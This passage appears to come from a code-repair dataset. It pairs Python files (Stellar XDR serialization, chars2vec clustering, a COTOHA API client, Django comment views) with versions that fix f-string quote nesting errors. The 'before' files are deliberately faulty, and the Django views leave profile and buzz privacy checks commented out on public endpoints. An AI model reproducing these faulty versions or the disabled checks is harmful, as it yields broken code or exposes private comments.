asset=asset,
amount=amount,
)
def to_xdr_bytes(self) -> bytes:
packer = Packer()
self.pack(packer)
return packer.get_buffer()
@classmethod
def from_xdr_bytes(cls, xdr: bytes) -> "PaymentOp":
unpacker = Unpacker(xdr)
return cls.unpack(unpacker)
def to_xdr(self) -> str:
xdr_bytes = self.to_xdr_bytes()
return base64.b64encode(xdr_bytes).decode()
@classmethod
def from_xdr(cls, xdr: str) -> "PaymentOp":
xdr_bytes = base64.b64decode(xdr.encode())
return cls.from_xdr_bytes(xdr_bytes)
def __eq__(self, other: object):
if not isinstance(other, self.__class__):
return NotImplemented
return (
self.destination == other.destination
and self.asset == other.asset
and self.amount == other.amount
)
def __str__(self):
out = [
f"destination={self.destination}",
f"asset={self.asset}",
f"amount={self.amount}",
]
return f"<PaymentOp {[", ".join(out)]}>"
| # This is an automatically generated file.
# DO NOT EDIT or your changes may be overwritten
import base64
from xdrlib import Packer, Unpacker
from .asset import Asset
from .int64 import Int64
from .muxed_account import MuxedAccount
__all__ = ["PaymentOp"]
class PaymentOp:
"""
XDR Source Code
----------------------------------------------------------------
struct PaymentOp
{
MuxedAccount destination; // recipient of the payment
Asset asset; // what they end up with
int64 amount; // amount they end up with
};
----------------------------------------------------------------
"""
def __init__(
self,
destination: MuxedAccount,
asset: Asset,
amount: Int64,
) -> None:
self.destination = destination
self.asset = asset
self.amount = amount
def pack(self, packer: Packer) -> None:
self.destination.pack(packer)
self.asset.pack(packer)
self.amount.pack(packer)
@classmethod
def unpack(cls, unpacker: Unpacker) -> "PaymentOp":
destination = MuxedAccount.unpack(unpacker)
asset = Asset.unpack(unpacker)
amount = Int64.unpack(unpacker)
return cls(
destination=destination,
asset=asset,
amount=amount,
)
def to_xdr_bytes(self) -> bytes:
packer = Packer()
self.pack(packer)
return packer.get_buffer()
@classmethod
def from_xdr_bytes(cls, xdr: bytes) -> "PaymentOp":
unpacker = Unpacker(xdr)
return cls.unpack(unpacker)
def to_xdr(self) -> str:
xdr_bytes = self.to_xdr_bytes()
return base64.b64encode(xdr_bytes).decode()
@classmethod
def from_xdr(cls, xdr: str) -> "PaymentOp":
xdr_bytes = base64.b64decode(xdr.encode())
return cls.from_xdr_bytes(xdr_bytes)
def __eq__(self, other: object):
if not isinstance(other, self.__class__):
return NotImplemented
return (
self.destination == other.destination
and self.asset == other.asset
and self.amount == other.amount
)
def __str__(self):
out = [
f"destination={self.destination}",
f"asset={self.asset}",
f"amount={self.amount}",
]
return f"<PaymentOp {[', '.join(out)]}>"
|
import chars2vec
import csv
from sklearn.cluster import SpectralClustering
def spectralClustering():
words=[]
with open('./datasetFit.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
#print(f'Column names are {', '.join(row)}')
line_count += 1
else:
words.append(row[2])
line_count += 1
with open('./datasetCouple.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
arrayDiStringhe=[]
for row in csv_reader:
if line_count == 0:
#print(f'Column names are {', '.join(row)}')
line_count += 1
else:
words.append(row)
line_count += 1
for i in range(len(words)):
if(words[i]):
stringa = str(words[i])
stringa = stringa.replace("[", "")
stringa = stringa.replace("]", "")
stringa = stringa.replace("'", "")
arrayDiStringhe.append(stringa)
c2v_model = chars2vec.load_model('eng_50')
word_embeddings = c2v_model.vectorize_words(arrayDiStringhe)
#print(word_embeddings)
#print(len(word_embeddings))
clustering = SpectralClustering(n_clusters=9,
assign_labels="discretize",
random_state=0).fit(word_embeddings)
labels=clustering.labels_
#print(labels)
l=len(labels)
if (labels[l-1]==labels[l-2]):
#print('TRUE')
return True
else:
#print('FALSE')
return False
| import chars2vec
import csv
from sklearn.cluster import SpectralClustering
def spectralClustering():
words=[]
with open('./datasetFit.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
#print(f'Column names are {", ".join(row)}')
line_count += 1
else:
words.append(row[2])
line_count += 1
with open('./datasetCouple.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
arrayDiStringhe=[]
for row in csv_reader:
if line_count == 0:
#print(f'Column names are {", ".join(row)}')
line_count += 1
else:
words.append(row)
line_count += 1
for i in range(len(words)):
if(words[i]):
stringa = str(words[i])
stringa = stringa.replace("[", "")
stringa = stringa.replace("]", "")
stringa = stringa.replace("'", "")
arrayDiStringhe.append(stringa)
c2v_model = chars2vec.load_model('eng_50')
word_embeddings = c2v_model.vectorize_words(arrayDiStringhe)
#print(word_embeddings)
#print(len(word_embeddings))
clustering = SpectralClustering(n_clusters=9,
assign_labels="discretize",
random_state=0).fit(word_embeddings)
labels=clustering.labels_
#print(labels)
l=len(labels)
if (labels[l-1]==labels[l-2]):
#print('TRUE')
return True
else:
#print('FALSE')
return False
|
import os
import inspect
from lib.apirequest import ApiRequest
class ApiCotoha():
def __init__(self, clientId, clientSecret):
self.__clientId = clientId
self.__clientSecret = clientSecret
def __access(self):
at = ApiRequest('https://api.ce-cotoha.com/v1/oauth/accesstokens', 'POST')
at.addHeader({'Content-Type':'application/json'})
at.addParam({
'grantType': 'client_credentials',
'clientId': self.__clientId,
'clientSecret': self.__clientSecret,
})
res = at.throw()
if not res:
print('cotoha auth is failed')
exit(1)
return res['access_token']
def __common(self, param):
target = inspect.currentframe().f_back.f_code.co_name
ar = ApiRequest(f'https://api.ce-cotoha.com/api/dev/nlp/v1/{target}', 'POST')
ar.addHeader({
'Content-Type' : 'application/json;charset=UTF-8',
'Authorization' : f"Bearer {self.__access()}",
})
ar.addParam(param)
res = ar.throw()
if not res:
return False
if res['status'] != 0:
print(f'status:{res['status']}')
print(f'message:{res['message']}')
return False
return res['result']
def keyword(self, document):
return self.__common(
{
'document': document,
'type' : 'kuzure',
'max_keyword_num' : 10,
}
)
def similarity(self, s1, s2):
return self.__common(
{
's1': s1,
's2': s2,
'type' : 'kuzure',
}
)
| import os
import inspect
from lib.apirequest import ApiRequest
class ApiCotoha():
def __init__(self, clientId, clientSecret):
self.__clientId = clientId
self.__clientSecret = clientSecret
def __access(self):
at = ApiRequest('https://api.ce-cotoha.com/v1/oauth/accesstokens', 'POST')
at.addHeader({'Content-Type':'application/json'})
at.addParam({
'grantType': 'client_credentials',
'clientId': self.__clientId,
'clientSecret': self.__clientSecret,
})
res = at.throw()
if not res:
print('cotoha auth is failed')
exit(1)
return res['access_token']
def __common(self, param):
target = inspect.currentframe().f_back.f_code.co_name
ar = ApiRequest(f'https://api.ce-cotoha.com/api/dev/nlp/v1/{target}', 'POST')
ar.addHeader({
'Content-Type' : 'application/json;charset=UTF-8',
'Authorization' : f"Bearer {self.__access()}",
})
ar.addParam(param)
res = ar.throw()
if not res:
return False
if res['status'] != 0:
print(f'status:{res["status"]}')
print(f'message:{res["message"]}')
return False
return res['result']
def keyword(self, document):
return self.__common(
{
'document': document,
'type' : 'kuzure',
'max_keyword_num' : 10,
}
)
def similarity(self, s1, s2):
return self.__common(
{
's1': s1,
's2': s2,
'type' : 'kuzure',
}
)
|
from django.db.models import Q
from rest_framework import status
from rest_framework.exceptions import NotAuthenticated, PermissionDenied
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView
from bumblebee.buzzes.utils import (
get_buzz_from_buzzid_or_raise,
get_rebuzz_from_rebuzzid_or_raise,
)
from bumblebee.comments.utils import (
get_comment_from_commentid_or_raise,
get_comments_from_commentid_list,
)
from bumblebee.core.exceptions import (
ExtraFieldsError,
MissingFieldsError,
NoneExistenceError,
UrlParameterError,
)
from bumblebee.core.helpers import (
RequestFieldsChecker,
create_200,
create_400,
create_500,
)
from bumblebee.core.permissions import IsCommentOwner
from bumblebee.notifications.choices import ACTION_TYPE, CONTENT_TYPE
from bumblebee.notifications.utils import create_notification, delete_notification
from ..serializers.comment_serializers import (
CommentDetailSerializer,
CreateCommentSerializer,
EditCommentSerializer,
)
##################################
## RETRIEVE
##################################
class BuzzOrRebuzzCommentListView(APIView):
"""
Get comments and interactions for a given buzz
"""
permission_classes = [AllowAny]
def _get_url_buzz(self, url_buzzid):
""" """
if url_buzzid:
buzz_instance = get_buzz_from_buzzid_or_raise(buzzid=url_buzzid)
if buzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
return buzz_instance
else:
raise UrlParameterError(
"buzzid",
create_400(
400,
"Url Error",
"Url must contain `buzz id`",
),
)
def _get_url_rebuzz(self, url_rebuzzid):
""" """
if url_rebuzzid:
rebuzz_instance = get_rebuzz_from_rebuzzid_or_raise(rebuzzid=url_rebuzzid)
if rebuzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
return rebuzz_instance
else:
raise UrlParameterError(
"buzz or rebuzzid",
create_400(
400,
"Url Error",
"Url must contain `rebuzz id`",
),
)
def _get_comments(self, *args, **kwargs):
""" """
url_buzzid = self.kwargs.get("buzzid", False)
url_rebuzzid = self.kwargs.get("rebuzzid", False)
if url_buzzid:
buzz_instance = self._get_url_buzz(url_buzzid)
return buzz_instance.buzz_comment.filter(level=1)
elif url_rebuzzid:
rebuzz_instance = self._get_url_rebuzz(url_rebuzzid)
return rebuzz_instance.rebuzz_comment.filter(level=1)
def get(self, request, *args, **kwargs):
""" """
try:
comment_instances = self._get_comments()
comment_serializer = CommentDetailSerializer(comment_instances, many=True)
return Response(
comment_serializer.data,
status=status.HTTP_200_OK,
)
except (MissingFieldsError, UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not get buzzes of `{kwargs.get("username")}` due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
class CommentReplyListView(APIView):
"""
Get comments and interactions for a given buzz
"""
permission_classes = [AllowAny]
def _get_url_comment(self, url_commentid):
""" """
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
# if comment_instance.parent_buzz:
# if comment_instance.parent_buzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# elif comment_instance.parent_buzz:
# if comment_instance.parent_rebuzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# if comment_instance.parent_buzz:
# if comment_instance.parent_buzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private Buzz",
# code="User has made their buzz private.",
# )
# elif comment_instance.parent_buzz:
# if comment_instance.parent_rebuzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private ReBuzz",
# code="User has made their rebuzz private.",
# )
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def _get_replies(self, *args, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = self._get_url_comment(url_commentid)
replyid_list = comment_instance.comment_interaction.replies
if len(replyid_list) != 0:
replies = get_comments_from_commentid_list(replyid_list)
objects = replies["comments"].filter(level=comment_instance.level + 1)
return objects
else:
return None
def get(self, request, *args, **kwargs):
""" """
try:
comment_instances = self._get_replies()
comment_serializer = CommentDetailSerializer(comment_instances, many=True)
return Response(
comment_serializer.data,
status=status.HTTP_200_OK,
)
except (MissingFieldsError, UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not get buzzes of `{kwargs.get("username")}` due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
class CommentDetailView(APIView):
""" """
permission_classes = [AllowAny]
def _get_url_comment(self, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
# if comment_instance.parent_buzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# if comment_instance.parent_buzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private Buzz",
# code="User has made their buzz private.",
# )
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def get(self, request, *args, **kwargs):
""" """
try:
comment_instance = self._get_url_comment(**kwargs)
serializer = CommentDetailSerializer(comment_instance)
return Response(
serializer.data,
status=status.HTTP_200_OK,
)
except (UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not get details for comment `id: {kwargs.get("commentid")}` due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
# ##################################
# ## CREATE
# ##################################
class CreateCommentView(APIView):
""" """
serializer_class = CreateCommentSerializer
permission_classes = [IsAuthenticated]
def _get_url_buzz(self, url_buzzid):
""" """
if url_buzzid:
buzz_instance = get_buzz_from_buzzid_or_raise(buzzid=url_buzzid)
if buzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
if buzz_instance.privacy == "priv":
raise PermissionDenied(
detail="Private Buzz",
code="User has made their buzz private.",
)
return buzz_instance
else:
raise UrlParameterError(
"buzzid",
create_400(
400,
"Url Error",
"Url must contain `buzz id`",
),
)
def _get_url_rebuzz(self, url_rebuzzid):
""" """
if url_rebuzzid:
rebuzz_instance = get_rebuzz_from_rebuzzid_or_raise(rebuzzid=url_rebuzzid)
if rebuzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
if rebuzz_instance.privacy == "priv":
raise PermissionDenied(
detail="Private Rebuzz",
code="User has made their rebuzz private.",
)
return rebuzz_instance
else:
raise UrlParameterError(
"buzz or rebuzzid",
create_400(
400,
"Url Error",
"Url must contain `rebuzz id`",
),
)
def post(self, request, *args, **kwargs):
""" """
try:
data = request.data
# check either image or content
RequestFieldsChecker().check_at_least_one_field_or_raise(
data, ["content", "images"]
)
serializer = self.serializer_class(data=data)
serializer.is_valid(raise_exception=True)
url_buzzid = self.kwargs.get("buzzid", False)
url_rebuzzid = self.kwargs.get("rebuzzid", False)
if url_buzzid:
buzz_instance = self._get_url_buzz(url_buzzid)
created_comment = serializer.save(
commenter=request.user,
parent_buzz=buzz_instance,
level=1,
**serializer.validated_data,
)
interaction = buzz_instance.buzz_interaction
interaction.comments.append(created_comment.id)
interaction.save()
# create notification
create_notification(
ACTION_TYPE["CMNT"],
CONTENT_TYPE["BUZZ"],
request.user,
buzz_instance,
created_comment,
)
elif url_rebuzzid:
rebuzz_instance = self._get_url_rebuzz(url_rebuzzid)
created_comment = serializer.save(
commenter=request.user,
parent_rebuzz=rebuzz_instance,
**serializer.validated_data,
)
interaction = rebuzz_instance.rebuzz_interaction
interaction.comments.append(created_comment.id)
interaction.save()
# create notification
create_notification(
ACTION_TYPE["CMNT"],
CONTENT_TYPE["RBZ"],
request.user,
rebuzz_instance,
created_comment,
)
return Response(
create_200(
status.HTTP_200_OK,
"Comment Created",
f"Comment created.\n {dict(commentid=created_comment.id, commenter=request.user.username)}",
),
status=status.HTTP_200_OK,
)
except (UrlParameterError, NoneExistenceError, MissingFieldsError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not create comment due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
class CreateCommentReplyView(APIView):
""" """
serializer_class = CreateCommentSerializer
permission_classes = [IsAuthenticated]
def _get_url_comment(self, *args, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
if comment_instance.parent_buzz:
if comment_instance.parent_buzz.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
if comment_instance.parent_buzz.privacy == "priv":
raise PermissionDenied(
detail="Private Buzz",
code="User has made their buzz private.",
)
elif comment_instance.parent_rebuzz:
if comment_instance.parent_rebuzz.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
if comment_instance.parent_rebuzz.privacy == "priv":
raise PermissionDenied(
detail="Private Rebuzz",
code="User has made their rebuzz private.",
)
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def post(self, request, *args, **kwargs):
""" """
try:
data = request.data
RequestFieldsChecker().check_at_least_one_field_or_raise(
data, ["content", "images"]
)
parent_comment = self._get_url_comment(**kwargs)
serializer = self.serializer_class(data=data)
serializer.is_valid(raise_exception=True)
created_comment = serializer.save(
commenter=request.user,
parent_buzz=parent_comment.parent_buzz,
parent_rebuzz=parent_comment.parent_rebuzz,
parent_comment=parent_comment.id,
level=parent_comment.level + 1,
**serializer.validated_data,
)
parent_comment.comment_interaction.replies.append(created_comment.id)
parent_comment.comment_interaction.save()
# create notification
create_notification(
ACTION_TYPE["RPLY"],
CONTENT_TYPE["CMNT"],
request.user,
parent_comment,
created_comment,
)
return Response(
create_200(
status.HTTP_200_OK,
"Comment Created",
f"Comment created.\n {dict(commentid=created_comment.id, commenter=request.user.username)}",
),
status=status.HTTP_200_OK,
)
except (UrlParameterError, NoneExistenceError, MissingFieldsError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not create comment due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
# ##################################
# ## UPDATE
# ##################################
class EditCommentView(APIView):
serializer_class = EditCommentSerializer
permission_classes = [
IsAuthenticated,
IsCommentOwner,
]
required_fields = ["content"]
field_options = ["content", "flair"]
def _get_url_comment(self, *args, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
# if comment_instance.parent_buzz:
# if comment_instance.parent_buzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# elif comment_instance.parent_rebuzz:
# if comment_instance.parent_rebuzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# if comment_instance.parent_buzz:
# if comment_instance.parent_buzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private Buzz",
# code="User has made their buzz private.",
# )
# elif comment_instance.parent_buzz:
# if comment_instance.parent_rebuzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private ReBuzz",
# code="User has made their rebuzz private.",
# )
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def patch(self, request, *args, **kwargs):
""" """
try:
data = request.data
comment_to_update = self._get_url_comment(**kwargs)
RequestFieldsChecker().check_fields(
data, self.field_options, self.required_fields
)
self.check_object_permissions(request, comment_to_update)
serializer = self.serializer_class(data=data)
serializer.is_valid(raise_exception=True)
serializer.update_comment(
comment_to_update, edited=True, **serializer.validated_data
)
return Response(
create_200(
status.HTTP_200_OK,
"Comment Updated",
f"Comment has been updated. `id:{comment_to_update.id}`",
),
status=status.HTTP_200_OK,
)
except (ExtraFieldsError, UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not edit comment due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
# ##################################
# ## DELETE
# ##################################
class DeleteCommentView(APIView):
serializer_class = EditCommentSerializer
permission_classes = [
IsAuthenticated,
IsCommentOwner,
]
def _get_url_comment(self, *args, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def _delete_interactions(self, comment_to_delete, comment_id):
"""Delete parent interactions"""
buzz_instance = comment_to_delete.parent_buzz
rebuzz_instance = comment_to_delete.parent_rebuzz
comment_instance = comment_to_delete.parent_comment
if buzz_instance:
buzz_instance.buzz_interaction.comments.remove(comment_id)
buzz_instance.save()
if rebuzz_instance:
rebuzz_instance.rebuzz_interaction.comments.remove(comment_id)
rebuzz_instance.save()
if comment_instance:
comment_instance.commenr_interaction.comment.remove(comment_id)
comment_instance.save()
def delete(self, request, *args, **kwargs):
""" """
try:
comment_to_delete = self._get_url_comment(**kwargs)
self.check_object_permissions(request, comment_to_delete)
comment_id = comment_to_delete.id
comment_to_delete.delete()
self._delete_interactions(comment_to_delete, comment_id)
return Response(
create_200(
status.HTTP_200_OK,
"Comment Deleted",
f"Comment has been deleted. `id:{comment_to_delete.id}`",
),
status=status.HTTP_200_OK,
)
except (UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not delete comment due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
| from django.db.models import Q
from rest_framework import status
from rest_framework.exceptions import NotAuthenticated, PermissionDenied
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView
from bumblebee.buzzes.utils import (
get_buzz_from_buzzid_or_raise,
get_rebuzz_from_rebuzzid_or_raise,
)
from bumblebee.comments.utils import (
get_comment_from_commentid_or_raise,
get_comments_from_commentid_list,
)
from bumblebee.core.exceptions import (
ExtraFieldsError,
MissingFieldsError,
NoneExistenceError,
UrlParameterError,
)
from bumblebee.core.helpers import (
RequestFieldsChecker,
create_200,
create_400,
create_500,
)
from bumblebee.core.permissions import IsCommentOwner
from bumblebee.notifications.choices import ACTION_TYPE, CONTENT_TYPE
from bumblebee.notifications.utils import create_notification, delete_notification
from ..serializers.comment_serializers import (
CommentDetailSerializer,
CreateCommentSerializer,
EditCommentSerializer,
)
##################################
## RETRIEVE
##################################
class BuzzOrRebuzzCommentListView(APIView):
"""
Get comments and interactions for a given buzz
"""
permission_classes = [AllowAny]
def _get_url_buzz(self, url_buzzid):
""" """
if url_buzzid:
buzz_instance = get_buzz_from_buzzid_or_raise(buzzid=url_buzzid)
if buzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
return buzz_instance
else:
raise UrlParameterError(
"buzzid",
create_400(
400,
"Url Error",
"Url must contain `buzz id`",
),
)
def _get_url_rebuzz(self, url_rebuzzid):
""" """
if url_rebuzzid:
rebuzz_instance = get_rebuzz_from_rebuzzid_or_raise(rebuzzid=url_rebuzzid)
if rebuzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
return rebuzz_instance
else:
raise UrlParameterError(
"buzz or rebuzzid",
create_400(
400,
"Url Error",
"Url must contain `rebuzz id`",
),
)
def _get_comments(self, *args, **kwargs):
""" """
url_buzzid = self.kwargs.get("buzzid", False)
url_rebuzzid = self.kwargs.get("rebuzzid", False)
if url_buzzid:
buzz_instance = self._get_url_buzz(url_buzzid)
return buzz_instance.buzz_comment.filter(level=1)
elif url_rebuzzid:
rebuzz_instance = self._get_url_rebuzz(url_rebuzzid)
return rebuzz_instance.rebuzz_comment.filter(level=1)
def get(self, request, *args, **kwargs):
""" """
try:
comment_instances = self._get_comments()
comment_serializer = CommentDetailSerializer(comment_instances, many=True)
return Response(
comment_serializer.data,
status=status.HTTP_200_OK,
)
except (MissingFieldsError, UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not get buzzes of `{kwargs.get('username')}` due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
class CommentReplyListView(APIView):
"""
Get comments and interactions for a given buzz
"""
permission_classes = [AllowAny]
def _get_url_comment(self, url_commentid):
""" """
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
# if comment_instance.parent_buzz:
# if comment_instance.parent_buzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# elif comment_instance.parent_buzz:
# if comment_instance.parent_rebuzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# if comment_instance.parent_buzz:
# if comment_instance.parent_buzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private Buzz",
# code="User has made their buzz private.",
# )
# elif comment_instance.parent_buzz:
# if comment_instance.parent_rebuzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private ReBuzz",
# code="User has made their rebuzz private.",
# )
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def _get_replies(self, *args, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = self._get_url_comment(url_commentid)
replyid_list = comment_instance.comment_interaction.replies
if len(replyid_list) != 0:
replies = get_comments_from_commentid_list(replyid_list)
objects = replies["comments"].filter(level=comment_instance.level + 1)
return objects
else:
return None
def get(self, request, *args, **kwargs):
""" """
try:
comment_instances = self._get_replies()
comment_serializer = CommentDetailSerializer(comment_instances, many=True)
return Response(
comment_serializer.data,
status=status.HTTP_200_OK,
)
except (MissingFieldsError, UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not get buzzes of `{kwargs.get('username')}` due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
class CommentDetailView(APIView):
""" """
permission_classes = [AllowAny]
def _get_url_comment(self, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
# if comment_instance.parent_buzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# if comment_instance.parent_buzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private Buzz",
# code="User has made their buzz private.",
# )
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def get(self, request, *args, **kwargs):
""" """
try:
comment_instance = self._get_url_comment(**kwargs)
serializer = CommentDetailSerializer(comment_instance)
return Response(
serializer.data,
status=status.HTTP_200_OK,
)
except (UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not get details for comment `id: {kwargs.get('commentid')}` due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
# ##################################
# ## CREATE
# ##################################
class CreateCommentView(APIView):
""" """
serializer_class = CreateCommentSerializer
permission_classes = [IsAuthenticated]
def _get_url_buzz(self, url_buzzid):
""" """
if url_buzzid:
buzz_instance = get_buzz_from_buzzid_or_raise(buzzid=url_buzzid)
if buzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
if buzz_instance.privacy == "priv":
raise PermissionDenied(
detail="Private Buzz",
code="User has made their buzz private.",
)
return buzz_instance
else:
raise UrlParameterError(
"buzzid",
create_400(
400,
"Url Error",
"Url must contain `buzz id`",
),
)
def _get_url_rebuzz(self, url_rebuzzid):
""" """
if url_rebuzzid:
rebuzz_instance = get_rebuzz_from_rebuzzid_or_raise(rebuzzid=url_rebuzzid)
if rebuzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
if rebuzz_instance.privacy == "priv":
raise PermissionDenied(
detail="Private Rebuzz",
code="User has made their rebuzz private.",
)
return rebuzz_instance
else:
raise UrlParameterError(
"buzz or rebuzzid",
create_400(
400,
"Url Error",
"Url must contain `rebuzz id`",
),
)
def post(self, request, *args, **kwargs):
""" """
try:
data = request.data
# check either image or content
RequestFieldsChecker().check_at_least_one_field_or_raise(
data, ["content", "images"]
)
serializer = self.serializer_class(data=data)
serializer.is_valid(raise_exception=True)
url_buzzid = self.kwargs.get("buzzid", False)
url_rebuzzid = self.kwargs.get("rebuzzid", False)
if url_buzzid:
